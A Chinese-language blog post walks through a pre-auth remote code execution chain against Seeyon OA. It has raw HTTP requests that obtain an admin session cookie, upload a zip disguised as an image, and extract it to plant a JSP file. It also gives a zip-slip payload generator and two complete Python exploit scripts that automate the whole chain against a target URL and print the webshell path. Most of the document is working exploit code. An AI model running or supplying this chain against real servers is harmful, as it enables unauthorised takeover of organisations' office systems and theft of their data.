致远OA 前台getshell 复现
首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的
POST /seeyon/thirdpartyController.do HTTP/1.1 Host: 192.168.10.2 User-Agent: python-requests/2.25.1 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Length: 133 Content-Type: application/x-www-form-urlencoded method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
上传压缩包
POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1 Host:192.168.10.2 Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.25.1 Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5 Content-Length: 841 Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name="firstSave" true --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name="callMethod" resizeLayout --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name="isEncrypt" 0 --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name="takeOver" false --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name="type" 0 --59229605f98b8cf290a7b8908b34616b Content-Disposition: form-data; name="file1"; filename="11.png" Content-Type: image/png 111 --59229605f98b8cf290a7b8908b34616b--
然后解压
POST /seeyon/ajax.do HTTP/1.1 Host: 192.168.10.2 User-Agent: python-requests/2.25.1 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=BDF7358D4C35C6D2BB99FADFEE21F913 Content-Length: 157 method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%222021-04-09%22%2C%225818374431215601542%22%5D
getshell 脚本
# coding: utf-8
import requests
import re
import time
proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
def seeyon_new_rce(targeturl):
orgurl = targeturl
# 通过请求直接获取管理员权限cookie
targeturl = orgurl + 'seeyon/thirdpartyController.do'
post={"method":"access","enc":"TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4","clientPath":"127.0.0.1"}
response = requests.post(url=targeturl,data=post,proxies=proxy, timeout=60,verify=False)
rsp = ""
if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower():
cookies = response.cookies
cookies = requests.utils.dict_from_cookiejar(cookies)
# 上传压缩文件
aaa=cookies['JSESSIONID']
print(aaa)
targeturl = orgurl + 'seeyon/fileUpload.do?method=processUpload'
files = [('file1', ('11.png', open('1.zip', 'r'), 'image/png'))]
print()
headers = {'Cookie':"JSESSIONID=%s"%aaa}
data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0',
'isEncrypt': "0"}
response = requests.post(url=targeturl,files=files,data=data, headers=headers,proxies=proxy,timeout=60,verify=False)
if response.text:
reg = re.findall('fileurls=fileurls\+","\+\'(.+)\'',response.text,re.I)
print(reg)
if len(reg)==0:
exit("匹配失败")
fileid=reg[0]
targeturl = orgurl + 'seeyon/ajax.do'
datestr = time.strftime('%Y-%m-%d')
post = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + datestr + '%22%2C%22' + fileid + '%22%5D'
#headers = {'Cookie': cookies}
headers['Content-Type']="application/x-www-form-urlencoded"
response = requests.post(targeturl, data=post,headers=headers,proxies=proxy,timeout=60,verify=False)
print(response.text)
seeyon_new_rce("https://baidu.com/")
shell地址:/seeyon/common/designer/pageLayout/a2345678.jsp
这个压缩包得自己生成了。压缩包里面一定得带有layout.xml 这个文件。空文件也行
例如这样的
演示的压缩包如下:
https://www.o2oxy.cn/wp-content/uploads/2021/04/1.zip
payload.zip 生产器
#coding: utf-8
import zipfile
def write_zipfile():
fname='../12345678.jsp'
content=r'webshell内容'
zf=zipfile.ZipFile('payload.zip',mode='a',compression=zipfile.ZIP_DEFLATED,)
zf.writestr('layout.xml',"")
zf.writestr(fname,content)
最终代码如下:
#coding:utf-8
import time
import datetime
import zipfile
import random
import string
import requests
import re
import os
requests.packages.urllib3.disable_warnings()
proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
ua = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
def check_file():
path = os.getcwd()
file_path = os.path.join(path,"payload.zip")
if os.path.exists(file_path):
os.remove(file_path)
def write_zipfile(fname, content):
with zipfile.ZipFile(
'payload.zip',
mode='a',
compression=zipfile.ZIP_DEFLATED,
) as zf:
zf.writestr('layout.xml', "")
zf.writestr(fname, content)
def rand_str(num):
ran_str = ''.join(random.sample(string.ascii_letters + string.digits, num))
return ran_str
def get_cookie(targeturl):
headers = {'User-Agent': ua,'Content-Type': 'application/x-www-form-urlencoded'}
url = '{targeturl}/seeyon/thirdpartyController.do'.format(targeturl=targeturl)
post="method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1".encode("utf-8")
response = requests.post(url=url,data=post,proxies=proxy,headers=headers, timeout=60,verify=False)
if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower():
cookies = response.cookies
cookies = requests.utils.dict_from_cookiejar(cookies)
jsessionid = cookies['JSESSIONID']
print("[+] get cookie:{jsessionid}".format(jsessionid=jsessionid))
return jsessionid
else:
print('[-] get cookie error !')
exit()
def upload_zip(targeturl,cookie):
url = '{targeturl}/seeyon/fileUpload.do?method=processUpload'.format(targeturl=targeturl)
files = [('file1', ('11.png', open('payload.zip', 'rb'), 'application/octet-stream'))]
headers = {'Cookie':'JSESSIONID={cookie}'.format(cookie=cookie),'User-Agent': ua}
post = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0',
'isEncrypt': "0"}
response = requests.post(url=url,files=files,data=post, headers=headers,proxies=proxy,timeout=60,verify=False)
if response and response.status_code == 200 and 'fileurls=' in response.text:
fileid = re.findall('fileurls=fileurls\+","\+\'(.+)\'',response.text,re.I)
if len(fileid) > 0:
print("[+] get fileid:{fileid}".format(fileid=fileid))
return fileid[0]
else:
print("[-] get fileid error !")
exit()
def extract_file(targeturl,cookie,fileid):
url = '{targeturl}/seeyon/ajax.do'.format(targeturl=targeturl)
headers = {'Cookie':'JSESSIONID={cookie}'.format(cookie=cookie),'User-Agent': ua, 'Content-Type':'application/x-www-form-urlencoded'}
datestr = time.strftime('%Y-%m-%d')
post = f'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22{datestr}%22%2C%22{fileid}%22%5D'
response = requests.post(url, data=post,headers=headers,proxies=proxy,timeout=60,verify=False)
if response.status_code == 500 and "Error" in response.text:
print("[+] extract file is ok!")
return True
else:
print("[-] extract file error !")
exit()
def main(targeturl):
fname = f'../{rand_str(8)}.jsp'
shell = r'<% out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM=")));new java.io.File(application.getRealPath(request.getServletPath())).delete();%>'
check_file()
write_zipfile(fname,shell)
cookie = get_cookie(targeturl)
fileid = upload_zip(targeturl, cookie)
if extract_file(targeturl, cookie, fileid):
url = targeturl + '/seeyon/common/designer/pageLayout/{fname}'.format(fname=fname.split('/')[1])
print("webshell path: {url}".format(url=url))
if __name__ == '__main__':
targeturl = "http://www.baidu.com"
main(targeturl)
